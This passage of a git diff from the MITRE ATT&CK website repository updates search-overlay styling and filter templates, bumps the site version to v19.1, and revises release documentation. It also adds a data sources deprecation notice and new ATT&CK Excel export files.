+  right: 0;
 }
 .overlay.search .overlay-inner .search-header .search-icons > div {
   display: inline-block;
@@ -1914,7 +1916,8 @@ div#sidebars {
   flex-shrink: 0;
   padding: 0 50px 12px;
 }
-.overlay.search .overlay-inner .search-filters button {
+.overlay.search .overlay-inner .search-filters button,
+.overlay.search .overlay-inner .search-filters .search-filter-chip {
   min-height: 36px;
   border: 1px solid rgb(223.125, 223.125, 223.125);
   border-radius: 4px;
@@ -1951,13 +1954,6 @@ div#sidebars {
   background: white;
   box-shadow: 0 8px 24px rgba(0, 0, 0, 0.15);
 }
-.overlay.search .overlay-inner .search-filters .search-filters-panel {
-  margin-top: 12px;
-  padding: 14px;
-  border: 1px solid rgb(223.125, 223.125, 223.125);
-  border-radius: 8px;
-}
-.overlay.search .overlay-inner .search-filters .search-filter-heading,
 .overlay.search .overlay-inner .search-filters .search-filter-group-heading {
   display: flex;
   align-items: center;
@@ -1966,13 +1962,6 @@ div#sidebars {
   margin-bottom: 8px;
   font-weight: 700;
 }
-.overlay.search .overlay-inner .search-filters .search-filter-heading {
-  text-transform: uppercase;
-  font-size: 0.8rem;
-}
-.overlay.search .overlay-inner .search-filters .search-filter-group {
-  margin-bottom: 14px;
-}
 .overlay.search .overlay-inner .search-filters .search-filter-actions {
   display: inline-flex;
   gap: 4px;
@@ -1987,10 +1976,24 @@ div#sidebars {
   flex-wrap: wrap;
   gap: 8px;
 }
-.overlay.search .overlay-inner .search-filters .search-filter-chips button {
+.overlay.search .overlay-inner .search-filters .search-filter-chip {
+  display: inline-flex;
+  align-items: center;
+  gap: 5px;
   padding: 5px 10px;
 }
-.overlay.search .overlay-inner .search-filters .search-filter-chips button.selected {
+.overlay.search .overlay-inner .search-filters .search-filter-chip input[type=checkbox] {
+  position: absolute;
+  width: 1px;
+  height: 1px;
+  padding: 0;
+  margin: -1px;
+  overflow: hidden;
+  clip: rect(0, 0, 0, 0);
+  white-space: nowrap;
+  border: 0;
+}
+.overlay.search .overlay-inner .search-filters .search-filter-chip.selected {
   border-color: #303435;
   background: #303435;
   color: #eaeaea;
@@ -2000,12 +2003,26 @@ div#sidebars {
   font-size: 0.8em;
   opacity: 0.8;
 }
+.overlay.search .overlay-inner .search-filters:not(.has-query) .search-filter-count {
+  display: none;
+}
 .overlay.search .overlay-inner .search-body {
   flex: 1 1 auto;
+  display: flex;
+  flex-direction: column;
+  min-height: 0;
   padding: 0 50px;
   border-top: 1px solid rgb(223.125, 223.125, 223.125);
   margin-bottom: 25px;
+  overflow: hidden;
+  scrollbar-gutter: stable;
+}
+.overlay.search .overlay-inner .search-body .results {
+  flex: 1 1 auto;
+  min-height: 0;
   overflow-y: auto;
+  padding-bottom: 64px;
+  scrollbar-gutter: stable;
 }
 .overlay.search .overlay-inner .search-body .results .search-result:first-child {
   margin-top: 1.5rem;
@@ -2013,24 +2030,114 @@ div#sidebars {
 .overlay.search .overlay-inner .search-body .results .search-result-badges {
   display: flex;
   flex-wrap: wrap;
-  gap: 5px;
-  margin: 4px 0 6px;
+  gap: 6px;
+  margin: 6px 0 8px;
 }
 .overlay.search .overlay-inner .search-body .results .search-result-badge {
-  padding: 1px 6px;
-  border: 1px solid rgb(223.125, 223.125, 223.125);
+  padding: 2px 8px;
+  border: 1px solid;
   border-radius: 4px;
-  font-size: 0.75rem;
+  color: white;
+  font-size: 0.8rem;
   font-weight: 700;
 }
+.overlay.search .overlay-inner .search-body .results .search-result-badge-page-type {
+  border-color: #303435;
+  background: rgb(59.925, 63.325, 64.175);
+}
+.overlay.search .overlay-inner .search-body .results .search-result-badge-domain {
+  border-color: #303435;
+  background: #303435;
+}
 .overlay.search .overlay-inner .search-body .results .search-no-results .preview {
   display: flex;
   align-items: center;
   gap: 8px;
   flex-wrap: wrap;
 }
-.overlay.search .overlay-inner .search-body .load-more-results {
-  text-align: center;
+.overlay.search .overlay-inner .search-body .search-results-footer {
+  flex-shrink: 0;
+  display: flex;
+  align-items: center;
+  gap: 12px;
+  padding: 12px 0;
+  margin-bottom: 10px;
+}
+.overlay.search .overlay-inner .search-body .search-results-count {
+  font-weight: 700;
+}
+.overlay.search .overlay-inner .search-body .search-results-pagination {
+  flex-shrink: 0;
+  display: flex;
+  justify-content: flex-end;
+  min-height: 58px;
+  padding: 12px 0 14px;
+  border-top: 1px solid rgb(223.125, 223.125, 223.125);
+  background: white;
+}
+.overlay.search .overlay-inner .search-body .search-results-pagination:empty {
+  display: none;
+}
+.overlay.search .overlay-inner .search-body .search-pagination {
+  display: flex;
+  align-items: center;
+  gap: 5px;
+  flex-wrap: wrap;
+  justify-content: flex-end;
+}
+.overlay.search .overlay-inner .search-body .search-pagination button {
+  min-height: 36px;
+  padding: 5px 12px;
+  border: 1px solid rgb(223.125, 223.125, 223.125);
+  border-radius: 4px;
+  background: white;
+  color: #39434c;
+  cursor: pointer;
+  font-weight: 700;
+}
+.overlay.search .overlay-inner .search-body .search-pagination button.current {
+  border-color: #303435;
+  background: #303435;
+  color: #eaeaea;
+}
+.overlay.search .overlay-inner .search-body .search-pagination button:disabled {
+  cursor: default;
+  opacity: 0.5;
+}
+.overlay.search .overlay-inner .search-body .search-pagination .search-pagination-control-icon {
+  display: inline-flex;
+  align-items: center;
+  justify-content: center;
+  min-width: 36px;
+  padding: 5px;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-pages {
+  display: inline-flex;
+  align-items: center;
+  gap: 5px;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-ellipsis {
+  display: inline-flex;
+  align-items: center;
+  min-height: 36px;
+  padding: 0 4px;
+  color: #303435;
+  font-weight: 700;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-icon {
+  width: 0;
+  height: 0;
+  border-top: 6px solid transparent;
+  border-bottom: 6px solid transparent;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-icon-prev {
+  border-right: 8px solid currentcolor;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-icon-next {
+  border-left: 8px solid currentcolor;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-mobile {
+  display: none;
 }
 
 .page-search {
@@ -2043,7 +2150,7 @@ div#sidebars {
     flex-basis: 50vh !important;
   }
 }
-@media screen and (min-width: 1px) and (max-width: 767.8px) {
+@media screen and (width >= 1px) and (width <= 767.8px) {
   .overlay.search {
     padding: 15px !important;
   }
@@ -2059,28 +2166,37 @@ div#sidebars {
     padding-left: 15px !important;
     padding-right: 15px !important;
   }
-  .overlay.search .search-filters button {
+  .overlay.search .search-filters button,
+  .overlay.search .search-filter-chip {
     min-height: 40px;
   }
   .overlay.search .search-filter-dropdown {
     position: static !important;
   }
   .overlay.search .search-filter-dropdown-menu {
+    position: static !important;
+    margin-top: 6px !important;
     left: 15px !important;
     right: 15px !important;
     width: auto !important;
     min-width: 0 !important;
     max-width: none !important;
   }
-  .overlay.search .search-filters-panel {
-    padding: 10px !important;
-  }
-  .overlay.search .search-filter-heading,
   .overlay.search .search-filter-group-heading {
     align-items: flex-start !important;
     flex-direction: column !important;
     gap: 5px !important;
   }
+  .overlay.search .search-results-footer {
+    align-items: flex-start !important;
+    flex-direction: column !important;
+  }
+  .overlay.search .search-pagination-pages {
+    display: none !important;
+  }
+  .overlay.search .search-pagination-mobile {
+    display: inline-block !important;
+  }
   .close-search-icon {
     font-size: 25px !important;
     line-height: 25px !important;
diff --git a/attack-theme/templates/macros/search.html b/attack-theme/templates/macros/search.html
index 593cef53e58..8dc25b2cfb5 100644
--- a/attack-theme/templates/macros/search.html
+++ b/attack-theme/templates/macros/search.html
@@ -33,14 +33,18 @@
                             </span>
                         </div>
                         <div class="search-filter-chips">
-                            <button type="button" data-search-filter-page-type="matrices">Matrices <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-page-type="tactics">Tactics <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-page-type="techniques">Techniques <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-page-type="sub-techniques">Sub-Techniques <span
-                                class="search-filter-count">0</span></button>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="matrices">Matrices <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="tactics">Tactics <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="techniques">Techniques <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="sub-techniques">Sub-Techniques <span
+                                class="search-filter-count"></span></label>
                         </div>
                     </div>
                 </div>
@@ -62,16 +66,21 @@
                             </span>
                         </div>
                         <div class="search-filter-chips">
-                            <button type="button" data-search-filter-page-type="mitigations">Mitigations <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-page-type="assets">Assets <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-page-type="detectionstrategies">Detection
-                                Strategies <span class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-page-type="analytics">Analytics <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-page-type="datacomponents">Data Components <span
-                                class="search-filter-count">0</span></button>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="mitigations">Mitigations <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="assets">Assets <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="detectionstrategies">Detection Strategies <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="analytics">Analytics <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="datacomponents">Data Components <span
+                                class="search-filter-count"></span></label>
                         </div>
                     </div>
                 </div>
@@ -93,12 +102,15 @@
                             </span>
                         </div>
                         <div class="search-filter-chips">
-                            <button type="button" data-search-filter-page-type="groups">Groups <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-page-type="software">Software <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-page-type="campaigns">Campaigns <span
-                                class="search-filter-count">0</span></button>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="groups">Groups <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="software">Software <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="campaigns">Campaigns <span
+                                class="search-filter-count"></span></label>
                         </div>
                     </div>
                 </div>
@@ -120,8 +132,9 @@
                             </span>
                         </div>
                         <div class="search-filter-chips">
-                            <button type="button" data-search-filter-page-type="resources">Resources <span
-                                class="search-filter-count">0</span></button>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-page-type="resources">Resources <span
+                                class="search-filter-count"></span></label>
                         </div>
                     </div>
                 </div>
@@ -141,136 +154,29 @@
                             </span>
                         </div>
                         <div class="search-filter-chips">
-                            <button type="button" data-search-filter-domain="enterprise">Enterprise <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-domain="mobile">Mobile <span
-                                class="search-filter-count">0</span></button>
-                            <button type="button" data-search-filter-domain="ics">ICS <span
-                                class="search-filter-count">0</span></button>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-domain="enterprise">Enterprise <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-domain="mobile">Mobile <span
+                                class="search-filter-count"></span></label>
+                            <label class="search-filter-chip"><input type="checkbox"
+                                data-search-filter-domain="ics">ICS <span
+                                class="search-filter-count"></span></label>
                         </div>
                     </div>
                 </div>
-                <button type="button" class="search-filter-summary-chip" id="search-filters-toggle"
-                    data-search-filter-toggle aria-controls="search-filters-panel" aria-expanded="false">
-                    Show all Filters
-                </button>
-            </div>
-            <div class="search-filters-panel" id="search-filters-panel" aria-hidden="true" style="display: none;">
-                <div class="search-filter-heading">
-                    <span>Page type</span>
-                    <span class="search-filter-actions">
-                        <button type="button" data-search-filter-page-types-action="all">All</button>
-                        <button type="button" data-search-filter-page-types-action="none">None</button>
-                    </span>
-                </div>
-
-                <div class="search-filter-group">
-                    <div class="search-filter-group-heading">
-                        <span>Core ATT&CK Objects</span>
-                        <span class="search-filter-actions">
-                            <button type="button" data-search-filter-group="core"
-                                data-search-filter-group-action="all">All</button>
-                            <button type="button" data-search-filter-group="core"
-                                data-search-filter-group-action="none">None</button>
-                        </span>
-                    </div>
-                    <div class="search-filter-chips">
-                        <button type="button" data-search-filter-page-type="matrices">Matrices <span
-                            class="search-filter-count">0</span></button>
-                        <button type="button" data-search-filter-page-type="tactics">Tactics <span
-                            class="search-filter-count">0</span></button>
-                        <button type="button" data-search-filter-page-type="techniques">Techniques <span
-                            class="search-filter-count">0</span></button>
-                        <button type="button" data-search-filter-page-type="sub-techniques">Sub-Techniques <span
-                            class="search-filter-count">0</span></button>
-                    </div>
-                </div>
-
-                <div class="search-filter-group">
-                    <div class="search-filter-group-heading">
-                        <span>Defenses</span>
-                        <span class="search-filter-actions">
-                            <button type="button" data-search-filter-group="defenses"
-                                data-search-filter-group-action="all">All</button>
-                            <button type="button" data-search-filter-group="defenses"
-                                data-search-filter-group-action="none">None</button>
-                        </span>
-                    </div>
-                    <div class="search-filter-chips">
-                        <button type="button" data-search-filter-page-type="mitigations">Mitigations <span
-                            class="search-filter-count">0</span></button>
-                        <button type="button" data-search-filter-page-type="assets">Assets <span
-                            class="search-filter-count">0</span></button>
-                        <button type="button" data-search-filter-page-type="detectionstrategies">Detection Strategies
-                            <span class="search-filter-count">0</span></button>
-                        <button type="button" data-search-filter-page-type="analytics">Analytics <span
-                            class="search-filter-count">0</span></button>
-                        <button type="button" data-search-filter-page-type="datacomponents">Data Components <span
-                            class="search-filter-count">0</span></button>
-                    </div>
-                </div>
-
-                <div class="search-filter-group">
-                    <div class="search-filter-group-heading">
-                        <span>CTI</span>
-                        <span class="search-filter-actions">
-                            <button type="button" data-search-filter-group="cti"
-                                data-search-filter-group-action="all">All</button>
-                            <button type="button" data-search-filter-group="cti"
-                                data-search-filter-group-action="none">None</button>
-                        </span>
-                    </div>
-                    <div class="search-filter-chips">
-                        <button type="button" data-search-filter-page-type="groups">Groups <span
-                            class="search-filter-count">0</span></button>
-                        <button type="button" data-search-filter-page-type="software">Software <span
-                            class="search-filter-count">0</span></button>
-                        <button type="button" data-search-filter-page-type="campaigns">Campaigns <span
-                            class="search-filter-count">0</span></button>
-                    </div>
-                </div>
-
-                <div class="search-filter-group">
-                    <div class="search-filter-group-heading">
-                        <span>Reference</span>
-                        <span class="search-filter-actions">
-                            <button type="button" data-search-filter-group="reference"
-                                data-search-filter-group-action="all">All</button>
-                            <button type="button" data-search-filter-group="reference"
-                                data-search-filter-group-action="none">None</button>
-                        </span>
-                    </div>
-                    <div class="search-filter-chips">
-                        <button type="button" data-search-filter-page-type="resources">Resources <span
-                            class="search-filter-count">0</span></button>
-                    </div>
-                </div>
-
-                <div class="search-filter-heading">
-                    <span>Domain</span>
-                    <span class="search-filter-actions">
-                        <button type="button" data-search-filter-domain-action="all">All</button>
-                        <button type="button" data-search-filter-domain-action="none">None</button>
-                    </span>
-                </div>
-                <div class="search-filter-chips">
-                    <button type="button" data-search-filter-domain="enterprise">Enterprise <span
-                        class="search-filter-count">0</span></button>
-                    <button type="button" data-search-filter-domain="mobile">Mobile <span
-                        class="search-filter-count">0</span></button>
-                    <button type="button" data-search-filter-domain="ics">ICS <span
-                        class="search-filter-count">0</span></button>
-                </div>
+                <button type="button" class="search-filter-summary-chip search-filter-reset"
+                    data-search-filter-reset style="display: none;">Reset filters</button>
             </div>
         </div>
-        <!-- results and controls for loading more results -->
+        <!-- results and pagination controls -->
         <div id="search-body" class="search-body">
+            <div id="search-results-footer" class="search-results-footer" aria-live="polite"></div>
             <div class="results" id="search-results">
                 <!-- content will be appended here on search -->
             </div>
-            <div id="load-more-results" class="load-more-results">
-                <button class="btn btn-default" id="load-more-results-button">load more results</button>
-            </div>
+            <div id="search-results-pagination" class="search-results-pagination"></div>
         </div>
     </div>
 </div>
diff --git a/data/versions.json b/data/versions.json
index 55aec8f581d..45d0053da02 100644
--- a/data/versions.json
+++ b/data/versions.json
@@ -1,9 +1,9 @@
 {
     "current": {
-        "name": "v19.0",
+        "name": "v19.1",
         "date_start": "April 28, 2026",
         "changelog": "updates-april-2026",
-        "cti_url": "https://github.com/mitre/cti/releases/tag/ATT%26CK-v19.0"
+        "cti_url": "https://github.com/mitre/cti/releases/tag/ATT%26CK-v19.1"
     },
     "previous": [
         {
diff --git a/docs/RELEASE.md b/docs/RELEASE.md
index a4ce9e36fac..7f8202358c3 100644
--- a/docs/RELEASE.md
+++ b/docs/RELEASE.md
@@ -16,7 +16,7 @@ If you are only updating the banner and nothing else, follow these steps.
 
 1. Verify that all features/bugs/documentation updates are tied to issues from the [issue tracker](https://github.com/mitre-attack/attack-website/issues).
 
-    * Make sure that each issue that is addressed has a corresponding `<issue-#>.[feature | bugfix | doc | misc]` in the `newsfragments/` directory.
+    * Update and commit any necessary changes to `CHANGELOG.md`
 
 2. Merge the `master` branch into the `develop` branch, since commits to `master` may have been made for banner updates.
 
@@ -27,7 +27,7 @@ If you are only updating the banner and nothing else, follow these steps.
 
 3. Verify that all required changes for the next release are present in the `develop` branch, including merging finished feature/bugfix branches.
 
-    * Update the website version number in `pyproject.toml`
+    * Update the website version number in `modules/site_config.py`
     * Update any dependencies needed in `requirements.txt`.
     * If applicable, update the year in the following files:
         * `attack-theme/templates/general/base-template.html`
@@ -36,44 +36,21 @@ If you are only updating the banner and nothing else, follow these steps.
         * `LICENSE.txt`
         * `README.md`
 
-4. Use `towncrier` to update the `CHANGELOG`
+4. If this website build includes ATT&CK/STIX content updates, see the appropriate section below for either Major or Minor ATT&CK releases
 
-     * Run `towncrier --draft`.
-     * If everything looks good, then proceed with running `towncrier`.
-         * This will delete the newsfragment files.
-         * Doublecheck the `CHANGELOG.md` file since the template isn't perfect and whitespace issues get introduced.
-             * Here is an example of `towncrier` output.
-               Notice that it adds a bunch of hyphens under the main header and adds a trailing newline.
-               These lines can be removed to ensure consistency with the rest of the CHANGELOG.md file.
-
-      ```text
-        # v4.0.0 (2022-10-25)
-        --------------------- <--- DELETE THIS LINE
-        ## Features
-
-        * Add support for [Campaigns](https://github.com/mitre/cti/blob/master/USAGE.md#campaigns) [#384]
-        (https://github.com/mitre-attack/attack-website/issues/384)
-        <newline>
-        <newline>  <-- DELETE THIS LINE
-      ```
-
-    * Run `git status`, then stage and commit changes to `CHANGELOG.md` and removed files from `newsfragments/`.
-
-5. If this website build includes ATT&CK/STIX content updates, see the appropriate section below for either Major or Minor ATT&CK releases
-
-6. Build the website locally to do one final test that it looks correct
+5. Build the website locally to do one final test that it looks correct
 
     * e.g. `python update-attack.py --attack-brand --extras --no-test-exitstatus`
     * Look in the generated `reports/broken-links-report.txt` for broken links.
       Any broken links that start with `/versions/v*` can be ignored.
 
-7. Commit and push changes to the `develop` branch.
+6. Commit and push changes to the `develop` branch.
 
-8. Open a pull request from `develop` to `master` <https://github.com/mitre-attack/attack-website/pulls>.
+7. Open a pull request from `develop` to `master` <https://github.com/mitre-attack/attack-website/pulls>.
 
     * PR naming convention: "Update website to X.Y.Z"
 
-9. After the PR is accepted, tag the commit in the master branch and push the changes
+8. After the PR is accepted, tag the commit in the master branch and push the changes
 
     ```bash
     git checkout master
@@ -85,36 +62,30 @@ If you are only updating the banner and nothing else, follow these steps.
 
 ## ATT&CK Content updates
 
-Consult these sections as needed for step 5 in the above list.
+Consult these sections as needed for step 4 in the above list.
 
 * Create a detailed changelog for the release:
   * Create a new folder: `modules/resources/docs/changelogs/v<previous-ATT&CK-version>-v<current-ATT&CK-version>`
-  * Create a detailed changelog using mitreattack-python
+  * Create a detailed changelog and excel files using mitreattack-python
 
   ```sh
-  # Clone mitreattack-python repo and download latest ATT&CK STIX
-  git clone git@github.com:mitre-attack/mitreattack-python.git
-  cd mitreattack-python
-  python3 -m venv venv
-  . venv/bin/activate
-  pip install -r requirements-dev.txt
-  pip install -e .
-  cd examples/
-  download_attack_stix --all
-
-  # update the generate_multiple_attack_diffs.py file to have the correct comparison pairs
-  # run the script
-  python generate_multiple_attack_diffs.py
-
+  ATTACK_WEBSITE_REPO="/path/to/attack-website/repo"
+  ATTACK_PREVIOUS_VERSION=18.1
+  ATTACK_CURRENT_VERSION=19.0
+
+  # generate detailed changelog
+  uvx --from mitreattack-python attack-changelog \
+    --attack-website-links \
+    --old-version ${ATTACK_PREVIOUS_VERSION} \
+    --new-version ${ATTACK_CURRENT_VERSION} \
+    --output-dir ${ATTACK_WEBSITE_REPO}/modules/resources/docs/changelogs/v${ATTACK_PREVIOUS_VERSION}-v${ATTACK_CURRENT_VERSION}
+
+  # generate excel files
+  uvx --from mitreattack-python attack-to-excel from-release \
+    --version ${ATTACK_CURRENT_VERSION} \
+    --output=${ATTACK_WEBSITE_REPO}/modules/resources/docs/attack-excel-files
   ```
 
-  * Manually modify the detailed changelog's href's at the top for links to the Navigator layers and changelog.json
-    * TODO: one day modify the script above to not need this edit anymore
-  * Put the following files from the `diff_stix` command into the folder created above
-    * `changelog-detailed.html`
-    * `changelog.json`
-    * Any ATT&CK Navigator layer files that were generated
-
 ### Major release
 
 * Update `data/versions.json`
@@ -124,12 +95,15 @@ Consult these sections as needed for step 5 in the above list.
     * `cti_url`: should be tag URL for the release on the mitre/cti repo
     * `commit`: should be sha256 hash of latest commit from mitre-attack/attack-website on the `gh-pages` branch prior to new content release
 
-* Run the `archive-website.py` script to get the previously released archives of the ATT&CK website
+* (If not already completed for this release) Run the `archive-website.py` script to get the previously released archives of the ATT&CK website
   * Upload the `tar.gz` of the latest previous version of the website to the [Archived Website Files](https://github.com/mitre-attack/attack-website/releases/tag/archived-website-files) release
   * Optional - If sufficient changes were made to the archive process then re-upload all `tar.gz` files
 * Update notes
   * Add new file: `modules/resources/static_pages/updates-<month>-<year>.md`
   * Update former updates announcement file to specify end date of old release
+  * Create the release-summary table for the new updates page
+    * This is the markdown table at the top of the release announcement that lists the ATT&CK version, start/end dates, MITRE/CTI release links, and changelog links
+    * TODO - write a script to create the html table data for new releases
 * Update CHANGELOG.md
   * Add a bullet point to the Features section in the following format
 
@@ -150,6 +124,7 @@ Check the layer specification version [here](https://github.com/mitre-attack/att
   * Minor releases currently don't get their own update page, so make the following updates to the table at the top of the page:
     * Under the Data column: Add a new entry for the latest tag, using `<br />` to separate them
     * Under the Changelogs column: Add a new entry for the latest detailed changelog, for both HTML and JSON (also using `<br />` as a separator)
+    * TODO - write a script to update the html table data for new releases
 * Update CHANGELOG.md
   * Add a bullet point to the Features section in the following format
 
diff --git a/modules/datasources/templates/datasources-index.html b/modules/datasources/templates/datasources-index.html
index c72363d6e2e..3f42b01f657 100644
--- a/modules/datasources/templates/datasources-index.html
+++ b/modules/datasources/templates/datasources-index.html
@@ -2,6 +2,7 @@
 {% set title = "Data Sources | MITRE ATT&CK&reg;" %}
 {% set parsed = page.data | from_json %}
 {% set active_page = "datasources" -%}
+{% import 'macros/deprecated.html' as deprecated %}
 {% import 'macros/navigation.html' as navigation %}
 {% import 'macros/clean_output.html' as clean_output %}
 
@@ -27,6 +28,11 @@
       <div class="container-fluid">
         <div class="overflow-x-auto">
           <h1>Data Sources</h1>
+          {{ deprecated.deprecated("Data sources were deprecated in the ATT&CK v18 release in October 2025.
+            You can read more about the details of this change in our <a href='https://medium.com/mitre-attack/smarter-detection-strategies-in-attack-7e6738fec31f'>What Comes After Detection Rules? Smarter Detection Strategies in ATT&CK</a> blog post
+            and our <a href='https://attack.mitre.org/resources/updates/updates-october-2025/'>ATT&CK v18 release notes</a>.
+            The data sources page will remain available for reference, but no new data sources will be added to the framework.") }}
+          <br>
           <p>Data sources represent the various subjects/topics of information that can be collected by sensors/logs.
             Data sources also include data components, which identify specific properties/values of a data source
             relevant to detecting a given ATT&CK technique or sub-technique.</p>
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-analytics.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-analytics.xlsx
new file mode 100644
index 00000000000..ab10a66c3ee
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-analytics.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-campaigns.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-campaigns.xlsx
new file mode 100644
index 00000000000..7171e113653
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-campaigns.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-datacomponents.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-datacomponents.xlsx
new file mode 100644
index 00000000000..62683e30b4c
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-datacomponents.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-detectionstrategies.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-detectionstrategies.xlsx
new file mode 100644
index 00000000000..06a398c2dd0
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-detectionstrategies.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-groups.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-groups.xlsx
new file mode 100644
index 00000000000..3dc745b2db3
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-groups.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-matrices.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-matrices.xlsx
new file mode 100644
index 00000000000..cc58c7ec22c
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-matrices.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-mitigations.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-mitigations.xlsx
new file mode 100644
index 00000000000..329dd778602
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-mitigations.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-relationships.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-relationships.xlsx
new file mode 100644
index 00000000000..3104fcc96b8
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-relationships.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-software.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-software.xlsx
new file mode 100644
index 00000000000..d5a11015f59
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-software.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-tactics.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-tactics.xlsx
new file mode 100644
index 00000000000..ef49c3595aa
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-tactics.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-techniques.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-techniques.xlsx
new file mode 100644
index 00000000000..013274c17b9
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1-techniques.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1.xlsx b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1.xlsx
new file mode 100644
index 00000000000..41032fb0fc8
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/enterprise-attack/enterprise-attack-v19.1.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-analytics.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-analytics.xlsx
new file mode 100644
index 00000000000..32bee452ffd
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-analytics.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-assets.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-assets.xlsx
new file mode 100644
index 00000000000..6c8ee715189
